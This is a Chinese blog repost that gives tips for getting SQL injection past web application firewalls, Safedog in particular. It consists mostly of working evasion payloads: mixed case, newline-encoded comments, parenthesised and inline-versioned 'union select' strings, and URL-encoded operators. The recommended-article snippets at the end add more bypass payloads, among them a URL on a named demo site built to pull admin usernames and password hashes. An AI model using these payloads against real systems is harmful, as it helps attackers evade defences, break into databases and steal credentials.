绕WAF&安全狗新姿势

最新推荐文章于 2024-07-16 14:11:47 发布
最新推荐文章于 2024-07-16 14:11:47 发布
阅读量197 收藏 2
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/puhk/p/10699086.html
版权

俗话说只要思路宽,绕狗绕的欢。前段时间我有尝试着用以下的方法绕狗,效果还不错。不过这方法呢也许这段时间可以绕过,过段时间可能就失效了,大家还是要多去尝试找到更多的方法。

 

举例-->整型注入 绕过WAF

绕过方法:

  •   就是修改大小写 加%0a 或%0d去绕过(%0a是换行,%0d是回车) 如: and 1=1   可能会被过滤可改为  /*%0Aand%0a*/ 1=1  或  and 'a' in('a','b') 或  /*%0AaNd%0A*/ 1=1 
  •      Order by 7 可改为 group by 7 或group by (7)去绕过
  •      加括号去尝试         id=-1 union select 1,2,3 可改为    id=-1 union (((select (1),2,3)))

             加+ - ! @ 去尝试    id=-1 union select +或者@或者!或者- 1,2,3

             加%0a换行)            id=-1 union %0a select %0a 1,2,3

 

绕过安全狗:

  • And 可用 url编码%26表示
  • 加内联 和数字去绕过 如:http://www.xxx.com/union.php?id=-1 /*!union/*!44322/*!22322select*/ 1,2,3,4
  •   每个词前加它/*%!a*/ 就是干扰  如:http://www.xxx.com/union.php?id=-1 union/*%!a*/select/*%!a*/1,2,3,4

 

转载于:https://www.cnblogs.com/puhk/p/10699086.html

weixin_30471065
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
上传WAF的15中姿势
06-29
WAF进行文件上传的文旦,可以学习一些姿势加以利用。
WAF过的各种方法总结.pdf
07-09
WAF过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
WAF过的各种姿势
浅笑996的博客
10-23 2508
主要思路: 根据WAF部署位置,针对WAF、WEB服务器、WEB应用对协议解析、字符解析、文件名解析、编码解析以及SQL语法解析的差异,WAF,将payload送至服务器执行。 常用过方法: 1.转换特征字符大小写 2.利用注释过 3.编码特征字符过 4.分隔重写特征字符过 5.利用截断字符过 6.变换变量位置过 7.针对域名保护的过 8.超大数据包过 9.转换数据提交方式过...
安全狗等一些WAF收集
weixin_30491641的博客
01-23 344
安全狗sql注入 http://demo.74cms.com/plus/ajax_common.php?act=hotwordquery=錦union+select+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23 被拦截了,经过测试拦截的是select,那么把select换成/*!50000...
WAF
公众号shadow sock7
06-12 1391
参考: https://mp.weixin.qq.com/s/Qn-zh7SwG9wA3dGEz_AEqA 各类WAF是渗透测试人员的一项基本技能。WAF分为 云WAF(如 加速乐) 硬件WAF(如 绿盟WAF) 软件WAF(如 安全狗) 代码级WAF mysql注入关键字替换。如在mysql中,WAF将sleep()函数加入黑名单,可以用具备相似功能的benchmark()函数实现过。部分
小红伞的WAF一个过方法
weixin_30778805的博客
05-06 71
今天遇到一个小红伞的WAF,随手测了下,发现很多都拦截了。但是任何WAF都不是万能的。 对此,该WAF我发现了一个缺陷。例如在大小字符上没有做什么匹配策略。 我可以很轻易的过去。虽然没法构造能够通过名单的select,但是其他的都过去了。 把一些敏感的东西发出来,给有需要的人用。。 SeLECt 一开始这个是能够过的。但是貌似UNION查询就不能使用。 UnIon 这个没有被拦...
SQL注入WAF小结
05-08
然而,攻击者也在不断寻找的方法来过这些防护措施。本文将对几种常见的SQL注入WAF的方法进行详细说明。 #### 二、SQL注入类型 1. **GET注入**:通常发生在URL查询参数中。 2. **POST注入**:发生在...
分块WAF.zip
02-27
这是一个WAF的方法,大家能够学习到如何过的方法。能够提升自己的技术水品。
国外WAF姿势.pdf
05-09
Web应用程序防火墙(WAF);应用程序 独立于开发人员保护的设计和web应用程序 是为攻击提供特殊保护的系统。此外,应用程序开发人员 他们自己的功能也有问题
WAF安全狗知识整理
aiquan9342的博客
10-26 255
0x01 前言 目前市场上的WAF主要有以下几类 1. 以安全狗为代表的基于软件WAF 2. 百度加速乐、安全宝等部署在云端的WAF 3. 硬件WAF WAF的检测主要有三个阶段,我画了一张图进行说明 本文主要总结的就是针对上面的三个阶段的过策略。小菜一枚,迎拍砖。 0x02 WAF身份认证阶段的WAF是有一个白名单的,在白名单内的客户请求将不做检测 ...
安全狗继续注入的思路
08-30
安全狗继续注入的思路
可以waf的python脚本
04-19
.py文件 可以直接过主流waf的小伙伴可以下载使用
360 php waf,cmseasy 最版补丁过sql注入(过360waf
weixin_35648005的博客
03-12 486
首先还是老地方:archive_act.php(611行)function respond_action() {include_once ROOT . '/lib/plugins/pay/' . front::$get['code'] . '.php';$payclassname = front::$get['code'];$payobj = new $payclassname();$uri = ...
上传WAF几种常见的姿势
diechusi8056的博客
02-06 275
1:WTS-WAF 过上传 原内容: Content-Disposition: form-data; name="up_picture"; filename="xss.php" 添加回车 Content-Disposition: form-data; name="up_picture"; filename="xss.ph p" 2:百度云上传过见下: 百度云...
应用安全-安全设备-Waf系列-软Waf-安全狗(Safedog)
weixin_30855099的博客
08-15 628
安装 - Linux 下载 http://download.safedog.cn/safedog_linux64.tar.gz wget http://download.safedog.cn/safedog_linux64.tar.gz 解压 tar xvf safedog_linux64.tar 运行 ./install.py 卸载 进入安装包解压目录...
waf
qq_38675102的博客
02-08 341
关于WebWaf的简单介绍与过技术
WAF
Z_l123的博客
02-19 1945
实验原理 WAF (Web Application Firewall)的中文名称叫做"Web应用防火墙",通过检查HTTP的流量,它可以防御Web应用安全漏洞,如阻止SQL注入,跨站脚本(XSS)、文件包含和安全配置错误等漏洞引发的攻击。 作为攻击者来说,常见的WAF的方式包括大小写变换、编码、重写、巧用注释符、巧用盲注、同功能函数替换等。其中,重写适用于WAF只过滤一次敏感字的情况。比如 WAF过滤敏感字union,但只过滤一次,则可以写出类似ununionion这样的,过滤一次union后就会执行
sql注入过安全狗(官网waf)【原创】
weixin_30237281的博客
03-26 458
作者:风之传说 给大家来个全的过狗的语句。拿官方网站做测试。 众所周知,waf过select , 过 union ,过 from 是最难的。首先我们来看看官网: 来看看基础的and 1=1: 再来个联合查询 union select 1,2,3 可以看到,都会被拦截。由于此文不是装逼文,我们就不讲如何一步步进行突破了。我直接给出语句吧:%''union+/*!50000%53...
SQL注入安全狗waf防火墙,这一篇就够了,8k文案超详细
最新发布
xt350488的博客
07-16 1114
通过本文的详细解析和实验,我们深入了解了SQL注入攻击的基本原理及其在实际应用中的变种和过技巧。在面对如安全狗这样的WAF防护时,攻击者并非束手无策,而是可以通过多种方式过检测规则,成功实施SQL注入攻击。本文首先通过基础的SQL注入测试,验证了安全狗WAF对“and 1=1”等简单SQL注入模式的识别能力。随后,通过拆分和注释符的使用,我们发现WAF可能是通过识别特定模式(如“and”后紧跟空格和字符)来拦截SQL注入的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值